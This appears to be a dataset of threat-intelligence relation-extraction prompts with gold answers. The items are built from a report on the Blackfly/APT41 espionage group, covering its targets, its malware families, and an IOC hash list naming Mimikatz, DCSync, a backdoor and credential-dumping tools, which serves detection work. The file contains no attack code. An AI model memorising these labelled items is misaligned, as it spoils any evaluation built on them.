The Blackfly espionage group (APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Winnti Group
### Target Entity: Asia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Blackfly: Espionage Group Targets Materials Technology
Group targets multiple subsidiaries of single Asian conglomerate.
The Blackfly espionage group (APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Bronze Atlas
### Target Entity: Asia
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Blackfly: Espionage Group Targets Materials Technology
Group targets multiple subsidiaries of single Asian conglomerate.
The Blackfly espionage group (APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: U.S.
### Possible Relationship Labels:
['targets', 'located-at', 'is not related to', 'not sure']
### Text Passage:
Undeterred
Despite being the subject of a U.S. indictment, Blackfly has continued to mount attacks, seemingly undeterred by the publicity afforded to the group. Although it originally made a name for itself by attacking the gaming sector, the group appears focused on targeting intellectual property in a variety of sectors at present.
|
<label>targets</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: PlugX/Fast
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Winnti/Pasteboy
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Shadowpad
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
APT41
### Target Entity: PlugX/Fast
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Korplug
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
APT41
### Target Entity: Korplug
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
APT41
### Target Entity: Winnti/Pasteboy
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
APT41
### Target Entity: Shadowpad
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Longstanding APT group
Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010. Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families. The group initially made a name for itself through attacks on the computer gaming industry. It subsequently branched out into targeting a more diverse range of targets, including organizations in the semiconductor, telecoms, materials manufacturing, pharmaceutical, media and advertising, hospitality, natural resources, fintech, and food sectors.
Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41. A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link. Two Chinese nationals were alleged to have worked with both groups. A crossover in personnel may account for the similarities between both groups.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a
### Target Entity: DCSync
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
### Target Entity: Credential-dumping tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
### Target Entity: ForkPlayground
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
